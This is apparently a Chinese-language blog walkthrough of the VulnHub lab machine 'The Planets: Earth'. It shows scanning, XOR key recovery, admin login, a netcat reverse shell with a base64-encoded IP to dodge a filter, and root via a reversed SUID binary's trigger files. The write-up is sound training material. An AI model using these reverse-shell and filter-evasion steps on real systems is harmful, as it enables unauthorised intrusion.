The Planets: Earth

攻击机ip：192.168.108.50
靶机ip： 192.168.108.139

靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/

Kal ddddx ~ ❯ export ip=192.168.108.139                                                            took 11s at 14:12:52
Kal ddddx ~ ❯ rustscan -a $ip                                                                               at 14:14:04
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.139:22
Open 192.168.108.139:80
Open 192.168.108.139:443

扫描发现三个端口22,80,443

尝试访问80端口和443端口

图片.png

没有东西，尝试爆破目录，没有东西

考虑到有443端口，检查 SSL 证书,发现存在域名earth.local

添加到hosts里，尝试访问

图片.png

这是一个带表单的留言系统，每次提交后，留言会显示在页面下方 <ul> 列表中

尝试输入，发现留言内容已经被加密或编码后显示在网页上，考虑到要我们填写message key可能会出现

使用 message_key 做 AES、DES、XOR 等对称加密

把 key 拼到 message 中做加盐加密

或者直接把key作为口令加密的情况

图片.png

尝试编辑输入，再用py脚本还原过程，最后判断为XOR加密

Kal ddddx ~ ❯ cat decode1/XOR.py                                                                          ≡ at 15:47:48
plaintext = b"world"
ciphertext = bytes.fromhex("12170a1401")
key = bytes([c ^ p for c, p in zip(ciphertext, plaintext)])
print("Key:", key)

Kal ddddx ~ ❯ python decode1/XOR.py                                                                       ≡ at 15:48:04
Key: b'exxxe'

知道了加密方式，要尝试还原之前留言框的内容，接下来就要找密钥了，扫描目录，发现了一个admin目录

Kal ddddx ~ ❯ dirsearch -u http://earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,txt,html
/home/ddddx/tools/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, html | HTTP method: GET | Threads: 25 | Wordlist size: 207628

Target: http://earth.local/

[15:52:25] Scanning:
[15:52:26] 301 -     0B - /admin  ->  /admin/

图片.png

有个登录页面，尝试弱密码和万能密码登录,无果，让他先爆破着

考虑到之前我们查看域名的时候还有个子域名terratest.earth.local

尝试爆破子域名，因为有认证要求所以https

Kal ddddx ~ ❯ dirb  https://terratest.earth.local/                                               took 11s ≡ at 16:19:08

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jun 18 16:19:34 2025
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

-----------------
END_TIME: Wed Jun 18 16:19:39 2025
DOWNLOADED: 4612 - FOUND: 3

发现一个robots文件，里面写了不允许抓取的文件后缀，将常用的后缀放入字典，扫描以testingnotes为名的文件，最后扫出来个testingnotes.txt

图片.png

Kal ddddx ~ ❯ ffuf -w dic.txt -u https://terratest.earth.local/FUZZ -mc all -fc 404                       ≡ at 16:27:58

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://terratest.earth.local/FUZZ
 :: Wordlist         : FUZZ: /home/ddddx/dic.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

                        [Status: 200, Size: 26, Words: 4, Lines: 2, Duration: 137ms]
/testingnotes.txt       [Status: 200, Size: 546, Words: 82, Lines: 10, Duration: 61ms]
:: Progress: [15/15] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

尝试访问，发现这里给出了留言板的加密算法，那我们前面直接开始猜测明显太早了，应该先找其他提示的，而不是直接尝试还原密码，不过好在不过几次就试出来了

回到这里得出信息

1.terra为管理员用户名

2.testdata.txt 用于测试加密

图片.png

尝试访问testdata.txt，发现是段文本，考虑到说用于测试加密所以我们用留言板内容根据xor加密反推一下，因为第三句最长，所以先尝试第三句

1
2

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根据辐射测年估计和其他证据，地球形成于 45 亿多年前。在地球历史的前十亿年中，生命出现在海洋中，并开始影响地球的大气层和表面，导致厌氧生物和后来的好氧生物的繁殖。一些地质证据表明，生命可能早在 41 亿年前就已经出现。

Kal ddddx ~ ❯ cat decode1/XOR.py                                                                            at 09:47:21
plaintext = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
ciphertext = bytes.fromhex("2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a")
key = bytes([c ^ p for c, p in zip(ciphertext, plaintext)])
print("Key:", key)

Kal ddddx ~ ❯ python decode1/XOR.py                                                                         at 09:47:56
Key: b'earthclimatechangebad4humans'

成功获取加密密钥earthclimatechangebad4humans

获取密钥后尝试获取其他两句的内容，无果，那直接使用这个结果当密码登录试试

图片.png

成功登录并且能完成命令执行，那就上传一个shell,尝试之后发现提示远程连接被禁止，可能进行了过滤或者禁止了 curl、wget、nc 等工具访问外部地址或者限制了/dev/tcp,socket的使用

图片.png

尝试写入shell到文件也无效，尝试绕过,神奇的是执行命令nc或者wget并没有显示远程禁止访问，甚至传入不完整的ip地址也不会触发，只有
传入完整的ip地址时才会触发，所以我们可以考虑对IP地址转换

1	nc -c sh $(echo MTkyLjE2OC4xMDguNTAgNDQ0NA== \| base64 -d)

图片.png

(remote) apache@earth:/tmp$ whoami
apache
(remote) apache@earth:/tmp$ id
uid=48(apache) gid=48(apache) groups=48(apache)

成功进入，进行信息收集，发现

/usr/bin/reset_root
因为这是一个非标准 SUID 二进制 —— 它不是正常系统里该有的东西

怀疑为管理员的自建工具，而且名字看来和root有关可能是可以重置root的密码或者能切换为root账号

(remote) apache@earth:/tmp$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

执行一下，看输出说明这个 /usr/bin/reset_root 程序：

是一个自定义的 SUID 程序
它在运行前会检查某些"触发器（triggers）"是否满足
只有当所有 trigger 满足时，才会执行"reset root"的操作（可能提权）

(remote) apache@earth:/tmp$ strings /usr/bin/reset_root | grep -iE 'trigger|check|reset|fail|success|flag|root'
als rootH
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
reset_root_3.c

可以看到当程序执行成功时会将root的密码重置为Earth，并且虽然没直接写触发器的文件名但给了个重要提示reset_root_3.c这大概率是程序源码文件名，将reset_root程序base64加密后拷贝下来到本机还原，放到ida里看一下

(remote) apache@earth:/tmp$ base64 /usr/bin/reset_root > /tmp/reset_root.b64
(remote) apache@earth:/tmp$ cat /tmp/reset_root.b64
Kal ddddx ~ ❯ base64 -d reset_root.b64 > reset_root                                                 took 6s at 14:37:10
Kal ddddx ~ ❯ chmod +x reset_root                                                                           at 14:37:38
Kal ddddx ~ ❯ explorer.exe .

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [sp+3h] [bp-10BDh]@1
  int v5; // [sp+Bh] [bp-10B5h]@1
  char v6; // [sp+Fh] [bp-10B1h]@1
  __int64 v7; // [sp+10h] [bp-10B0h]@1
  __int64 v8; // [sp+18h] [bp-10A8h]@1
  char v9; // [sp+20h] [bp-10A0h]@1
  __int64 v10; // [sp+30h] [bp-1090h]@1
  __int64 v11; // [sp+38h] [bp-1088h]@1
  char v12; // [sp+40h] [bp-1080h]@1
  char name; // [sp+50h] [bp-1070h]@1
  char v14; // [sp+5Dh] [bp-1063h]@5
  char v15; // [sp+61h] [bp-105Fh]@1
  __int64 v16; // [sp+1050h] [bp-70h]@1
  __int64 v17; // [sp+1058h] [bp-68h]@1
  __int64 v18; // [sp+1060h] [bp-60h]@1
  __int64 v19; // [sp+1068h] [bp-58h]@1
  char v20; // [sp+1070h] [bp-50h]@1
  char v21; // [sp+1081h] [bp-3Fh]@1
  __int64 v22; // [sp+1090h] [bp-30h]@1
  __int64 v23; // [sp+1098h] [bp-28h]@1
  char v24; // [sp+10A0h] [bp-20h]@1
  __int64 v25; // [sp+10B0h] [bp-10h]@1
  int v26; // [sp+10B8h] [bp-8h]@1
  int v27; // [sp+10BCh] [bp-4h]@1

  v25 = 7310868739970064752LL;
  v26 = 7630692;
  v22 = 580991899969063172LL;
  v23 = 6150893463313718533LL;
  v24 = 94;
  v16 = 7598819853035991651LL;
  v17 = 8390047166775913569LL;
  v18 = 8390876006426637370LL;
  v19 = 32758215501637992LL;
  v27 = 0;
  v10 = 3666059865361499LL;
  v11 = 175771437991860558LL;
  v12 = 117;
  v7 = 3666059865361499LL;
  v8 = 7061757497007482958LL;
  v9 = 7;
  v4 = 2307565132488121435LL;
  v5 = 453453137;
  v6 = 0;
  magic_cipher(&v22, &v25, &v20, 17LL, 12LL);
  v21 = 0;
  puts("CHECKING IF RESET TRIGGERS PRESENT...");
  magic_cipher(&v10, &v20, &name, 17LL, 18LL);
  v15 = 0;
  if ( !access(&name, 0) )
    ++v27;
  magic_cipher(&v7, &v20, &name, 17LL, 18LL);
  v15 = 0;
  if ( !access(&name, 0) )
    ++v27;
  magic_cipher(&v4, &v20, &name, 13LL, 18LL);
  v14 = 0;
  if ( !access(&name, 0) )
    ++v27;
  if ( v27 == 3 )
  {
    puts("RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth");
    setuid(0);
    system("/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd");
  }
  else
  {
    puts("RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.");
  }
  return 0;
}

magic_cipher(&v10, &v20, &name, 17LL, 18LL);
if ( !access(&name, 0) ) ++v27;

magic_cipher(&v7, &v20, &name, 17LL, 18LL);
if ( !access(&name, 0) ) ++v27;

magic_cipher(&v4, &v20, &name, 13LL, 18LL);
if ( !access(&name, 0) ) ++v27;

说明一共有 3 个路径名通过 magic_cipher(...) 解密赋值给 name，然后判断这些路径是否存在
只有：

1	if (v27 == 3)

也就是 3 个文件都存在，才会执行提权行为,用strace来动态追踪 /usr/bin/reset_root 程序访问哪些文件路径,创建后成功执行，拿到flag

Kal ddddx ~ ❯ strace ~/reset_root 2>&1 | grep -iE 'open|access|stat'                                  ✔ 1|0 at 15:09:51
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=98218, ...}) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=2003408, ...}) = 0
fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)

(remote) apache@earth:/tmp$ touch /dev/shm/kHgTFI5G
(remote) apache@earth:/tmp$ touch /dev/shm/Zw7bV9U5
(remote) apache@earth:/tmp$ touch /tmp/kcM0Wewe
(remote) apache@earth:/tmp$ /usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
(remote) apache@earth:/tmp$ su root
Password:
(remote) root@earth:/tmp# cd /root
(remote) root@earth:/root# ls
anaconda-ks.cfg  root_flag.txt
(remote) root@earth:/root# cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

The Planets: Earth

The Planets: Earth

特色标签

链友